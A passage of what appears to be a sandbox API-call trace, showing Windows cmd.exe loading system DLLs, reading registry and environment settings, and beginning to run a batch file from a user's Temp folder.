0x7fefed8dfff entry_point = 0x7fefed60000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 840 start_va = 0x7feff1e0000 end_va = 0x7feff2e8fff entry_point = 0x7feff1e0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 841 start_va = 0x7feff4d0000 end_va = 0x7feff598fff entry_point = 0x7feff4d0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 842 start_va = 0x7feff5a0000 end_va = 0x7feff63efff entry_point = 0x7feff5a0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 843 start_va = 0x7feff860000 end_va = 0x7feff86dfff entry_point = 0x7feff860000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 845 start_va = 0x7feff0e0000 end_va = 0x7feff1bafff entry_point = 0x7feff0e0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 846 start_va = 0x7feff1c0000 end_va = 0x7feff1defff entry_point = 0x7feff1c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 847 start_va = 0x7feffc50000 end_va = 0x7feffd7cfff entry_point = 0x7feffc50000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 848 start_va = 0x100000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 849 start_va = 0x2080000 end_va = 0x234efff entry_point = 0x2080000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 34 os_tid = 0xa64 [0052.644] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fa50 | out: lpSystemTimeAsFileTime=0x28fa50*(dwLowDateTime=0xc4509ee0, dwHighDateTime=0x1d48db2)) [0052.644] GetCurrentProcessId () returned 0xa60 [0052.644] GetCurrentThreadId () returned 0xa64 [0052.644] GetTickCount () returned 0x1b8a4 [0052.644] QueryPerformanceCounter (in: lpPerformanceCount=0x28fa58 | out: lpPerformanceCount=0x28fa58*=1812026700000) returned 1 [0052.645] GetModuleHandleW (lpModuleName=0x0) returned 0x49e60000 [0052.646] __set_app_type (_Type=0x1) [0052.646] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e87810) returned 0x0 [0052.646] __getmainargs (in: _Argc=0x49eaa608, _Argv=0x49eaa618, _Env=0x49eaa610, _DoWildCard=0, _StartInfo=0x49e8e0f4 | out: _Argc=0x49eaa608, _Argv=0x49eaa618, _Env=0x49eaa610) returned 0 [0052.646] GetCurrentThreadId () returned 0xa64 [0052.646] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa64) returned 0x3c [0052.646] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77b20000 [0052.646] GetProcAddress (hModule=0x77b20000, lpProcName="SetThreadUILanguage") returned 0x77b36d40 [0052.646] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0052.646] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0052.646] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f9e8 | out: phkResult=0x28f9e8*=0x0) returned 0x2 [0052.647] VirtualQuery (in: lpAddress=0x28f9d0, lpBuffer=0x28f950, dwLength=0x30 | out: lpBuffer=0x28f950*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0052.647] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28f950, dwLength=0x30 | out: lpBuffer=0x28f950*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0052.647] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28f950, dwLength=0x30 | out: lpBuffer=0x28f950*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0052.647] VirtualQuery (in: lpAddress=0x194000, lpBuffer=0x28f950, dwLength=0x30 | out: lpBuffer=0x28f950*(BaseAddress=0x194000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0052.647] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28f950, dwLength=0x30 | out: lpBuffer=0x28f950*(BaseAddress=0x290000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0xf0000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30 [0052.647] GetConsoleOutputCP () returned 0x1b5 [0052.647] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e9bfe0 | out: lpCPInfo=0x49e9bfe0) returned 1 [0052.647] SetConsoleCtrlHandler (HandlerRoutine=0x49e83184, Add=1) returned 1 [0052.647] _get_osfhandle (_FileHandle=1) returned 0x7 [0052.647] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0052.647] _get_osfhandle (_FileHandle=1) returned 0x7 [0052.647] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e8e194 | out: lpMode=0x49e8e194) returned 1 [0052.648] _get_osfhandle (_FileHandle=1) returned 0x7 [0052.648] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0052.648] _get_osfhandle (_FileHandle=0) returned 0x3 [0052.648] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e8e198 | out: lpMode=0x49e8e198) returned 1 [0052.648] _get_osfhandle (_FileHandle=0) returned 0x3 [0052.648] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0052.648] GetEnvironmentStringsW () returned 0x398d00* [0052.648] FreeEnvironmentStringsW (penv=0x398d00) returned 1 [0052.648] GetEnvironmentStringsW () returned 0x398d00* [0052.649] FreeEnvironmentStringsW (penv=0x398d00) returned 1 [0052.649] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e8a8 | out: phkResult=0x28e8a8*=0x44) returned 0x0 [0052.649] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e8a0, lpData=0x28e8c0, lpcbData=0x28e8a4*=0x1000 | out: lpType=0x28e8a0*=0x0, lpData=0x28e8c0*=0x18, lpcbData=0x28e8a4*=0x1000) returned 0x2 [0052.649] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e8a0, lpData=0x28e8c0, lpcbData=0x28e8a4*=0x1000 | out: lpType=0x28e8a0*=0x4, lpData=0x28e8c0*=0x1, lpcbData=0x28e8a4*=0x4) returned 0x0 [0052.649] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e8a0, lpData=0x28e8c0, lpcbData=0x28e8a4*=0x1000 | out: lpType=0x28e8a0*=0x0, lpData=0x28e8c0*=0x1, lpcbData=0x28e8a4*=0x1000) returned 0x2 [0052.649] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e8a0, lpData=0x28e8c0, lpcbData=0x28e8a4*=0x1000 | out: lpType=0x28e8a0*=0x4, lpData=0x28e8c0*=0x0, lpcbData=0x28e8a4*=0x4) returned 0x0 [0052.649] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e8a0, lpData=0x28e8c0, lpcbData=0x28e8a4*=0x1000 | out: lpType=0x28e8a0*=0x4, lpData=0x28e8c0*=0x40, lpcbData=0x28e8a4*=0x4) returned 0x0 [0052.649] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e8a0, lpData=0x28e8c0, lpcbData=0x28e8a4*=0x1000 | out: lpType=0x28e8a0*=0x4, lpData=0x28e8c0*=0x40, lpcbData=0x28e8a4*=0x4) returned 0x0 [0052.649] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e8a0, lpData=0x28e8c0, lpcbData=0x28e8a4*=0x1000 | out: lpType=0x28e8a0*=0x0, lpData=0x28e8c0*=0x40, lpcbData=0x28e8a4*=0x1000) returned 0x2 [0052.649] RegCloseKey (hKey=0x44) returned 0x0 [0052.649] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e8a8 | out: phkResult=0x28e8a8*=0x44) returned 0x0 [0052.649] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e8a0, lpData=0x28e8c0, lpcbData=0x28e8a4*=0x1000 | out: lpType=0x28e8a0*=0x0, lpData=0x28e8c0*=0x40, lpcbData=0x28e8a4*=0x1000) returned 0x2 [0052.649] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e8a0, lpData=0x28e8c0, lpcbData=0x28e8a4*=0x1000 | out: lpType=0x28e8a0*=0x4, lpData=0x28e8c0*=0x1, lpcbData=0x28e8a4*=0x4) returned 0x0 [0052.649] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e8a0, lpData=0x28e8c0, lpcbData=0x28e8a4*=0x1000 | out: lpType=0x28e8a0*=0x0, lpData=0x28e8c0*=0x1, lpcbData=0x28e8a4*=0x1000) returned 0x2 [0052.649] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e8a0, lpData=0x28e8c0, lpcbData=0x28e8a4*=0x1000 | out: lpType=0x28e8a0*=0x4, lpData=0x28e8c0*=0x0, lpcbData=0x28e8a4*=0x4) returned 0x0 [0052.649] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e8a0, lpData=0x28e8c0, lpcbData=0x28e8a4*=0x1000 | out: lpType=0x28e8a0*=0x4, lpData=0x28e8c0*=0x9, lpcbData=0x28e8a4*=0x4) returned 0x0 [0052.649] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e8a0, lpData=0x28e8c0, lpcbData=0x28e8a4*=0x1000 | out: lpType=0x28e8a0*=0x4, lpData=0x28e8c0*=0x9, lpcbData=0x28e8a4*=0x4) returned 0x0 [0052.649] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e8a0, lpData=0x28e8c0, lpcbData=0x28e8a4*=0x1000 | out: lpType=0x28e8a0*=0x0, lpData=0x28e8c0*=0x9, lpcbData=0x28e8a4*=0x1000) returned 0x2 [0052.649] RegCloseKey (hKey=0x44) returned 0x0 [0052.650] time (in: timer=0x0 | out: timer=0x0) returned 0x5c09a223 [0052.650] srand (_Seed=0x5c09a223) [0052.650] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat\" \"" [0052.650] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat\" \"" [0052.650] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e9c0a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19 [0052.650] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x398d10, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0052.650] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e8f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91 [0052.650] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e8f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0052.650] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e8f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0052.650] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49e8f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0052.650] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49e8f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0052.650] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0052.650] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0052.650] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0052.650] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0052.650] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0052.650] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0052.650] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0052.650] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0052.651] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28f6b0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19 [0052.651] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x104, lpBuffer=0x28f6b0, lpFilePart=0x28f690 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x28f690*="Desktop") returned 0x19 [0052.651] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop")) returned 0x11 [0052.651] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f3c0 | out: lpFindFileData=0x28f3c0) returned 0x398b60 [0052.651] FindClose (in: hFindFile=0x398b60 | out: hFindFile=0x398b60) returned 1 [0052.651] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz", lpFindFileData=0x28f3c0 | out: lpFindFileData=0x28f3c0) returned 0x398b60 [0052.651] FindClose (in: hFindFile=0x398b60 | out: hFindFile=0x398b60) returned 1 [0052.651] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", lpFindFileData=0x28f3c0 | out: lpFindFileData=0x28f3c0) returned 0x398b60 [0052.651] FindClose (in: hFindFile=0x398b60 | out: hFindFile=0x398b60) returned 1 [0052.651] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop")) returned 0x11 [0052.651] SetCurrentDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop")) returned 1 [0052.651] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\aETAdzjz\\Desktop") returned 1 [0052.651] GetEnvironmentStringsW () returned 0x39c0a0* [0052.651] FreeEnvironmentStringsW (penv=0x39c0a0) returned 1 [0052.651] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e9c0a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19 [0052.652] GetConsoleOutputCP () returned 0x1b5 [0052.653] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e9bfe0 | out: lpCPInfo=0x49e9bfe0) returned 1 [0052.653] GetUserDefaultLCID () returned 0x409 [0052.653] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49e97b50, cchData=8 | out: lpLCData=":") returned 2 [0052.653] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28f7c0, cchData=128 | out: lpLCData="0") returned 2 [0052.653] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28f7c0, cchData=128 | out: lpLCData="0") returned 2 [0052.653] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28f7c0, cchData=128 | out: lpLCData="1") returned 2 [0052.653] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49eaa740, cchData=8 | out: lpLCData="/") returned 2 [0052.653] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49eaa4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0052.653] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49eaa460, cchData=32 | out: lpLCData="Tue") returned 4 [0052.653] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49eaa420, cchData=32 | out: lpLCData="Wed") returned 4 [0052.653] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49eaa3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0052.653] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49eaa3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0052.653] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49eaa360, cchData=32 | out: lpLCData="Sat") returned 4 [0052.653] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49eaa700, cchData=32 | out: lpLCData="Sun") returned 4 [0052.653] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49e97b40, cchData=8 | out: lpLCData=".") returned 2 [0052.653] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49eaa4e0, cchData=8 | out: lpLCData=",") returned 2 [0052.654] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0052.654] GetConsoleTitleW (in: lpConsoleTitle=0x399c00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0052.654] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77b20000 [0052.654] GetProcAddress (hModule=0x77b20000, lpProcName="CopyFileExW") returned 0x77b323d0 [0052.654] GetProcAddress (hModule=0x77b20000, lpProcName="IsDebuggerPresent") returned 0x77b28290 [0052.654] GetProcAddress (hModule=0x77b20000, lpProcName="SetConsoleInputExeNameW") returned 0x77b317e0 [0052.656] _wcsicmp (_String1="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat\"", _String2=")") returned -7 [0052.656] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat\"") returned 68 [0052.656] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat\"") returned 68 [0052.656] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat\"") returned 71 [0052.656] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat\"") returned 71 [0052.656] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat\"") returned 80 [0052.656] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat\"") returned 80 [0052.657] GetConsoleTitleW (in: lpConsoleTitle=0x28f6d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0052.657] GetFileAttributesW (lpFileName="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat\"" (normalized: "c:\\users\\aetadzjz\\desktop\\\"c:\\users\\aetadzjz\\appdata\\local\\temp\\tmp1971.bat\"")) returned 0xffffffff [0052.657] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0052.657] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0052.657] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0052.657] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0052.657] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0052.657] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0052.657] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0052.657] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0052.657] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0052.657] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0052.657] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0052.657] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0052.657] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0052.657] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0052.657] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0052.657] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0052.657] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0052.657] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0052.657] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0052.657] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0052.657] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0052.657] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0052.657] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0052.657] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0052.657] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0052.657] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0052.657] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0052.657] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0052.657] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0052.657] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0052.657] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0052.657] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0052.657] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0052.657] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0052.658] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0052.658] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0052.658] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0052.658] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0052.658] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0052.658] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0052.658] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0052.658] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0052.658] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0052.658] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0052.658] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0052.658] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0052.658] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0052.658] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0052.658] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0052.658] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0052.658] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0052.658] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0052.658] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0052.658] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0052.658] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0052.658] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0052.658] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0052.658] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0052.658] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0052.658] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0052.658] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0052.658] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0052.658] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0052.658] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0052.658] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0052.658] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0052.658] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0052.658] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0052.658] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0052.658] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0052.658] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0052.658] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0052.658] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0052.658] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0052.658] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0052.658] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0052.658] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0052.658] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0052.658] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0052.658] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0052.658] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0052.659] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0052.659] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0052.659] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0052.659] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0052.659] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0052.659] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0052.659] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0052.660] SetErrorMode (uMode=0x0) returned 0x0 [0052.660] SetErrorMode (uMode=0x1) returned 0x0 [0052.660] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\.", nBufferLength=0x208, lpBuffer=0x3a8110, lpFilePart=0x28ef60 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp", lpFilePart=0x28ef60*="Temp") returned 0x24 [0052.660] SetErrorMode (uMode=0x0) returned 0x1 [0052.660] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\.") returned 1 [0052.660] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e8f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0052.663] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0052.663] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat", fInfoLevelId=0x1, lpFindFileData=0x28ecd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28ecd0) returned 0x39a380 [0052.663] FindClose (in: hFindFile=0x39a380 | out: hFindFile=0x39a380) returned 1 [0052.664] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0052.664] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0052.664] GetConsoleTitleW (in: lpConsoleTitle=0x28f220, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0052.770] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x7feff0e0000 [0052.773] GetProcAddress (hModule=0x7feff0e0000, lpProcName="SaferIdentifyLevel") returned 0x7feff0fe470 [0052.774] IdentifyCodeAuthzLevelW () returned 0x1 [0052.779] GetProcAddress (hModule=0x7feff0e0000, lpProcName="SaferComputeTokenFromLevel") returned 0x7feff0ff9b0 [0052.779] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0052.779] GetProcAddress (hModule=0x7feff0e0000, lpProcName="SaferCloseLevel") returned 0x7feff0ff660 [0052.779] CloseCodeAuthzLevel () returned 0x1 [0052.779] SetErrorMode (uMode=0x0) returned 0x0 [0052.779] SetErrorMode (uMode=0x1) returned 0x0 [0052.779] GetFullPathNameW (in: 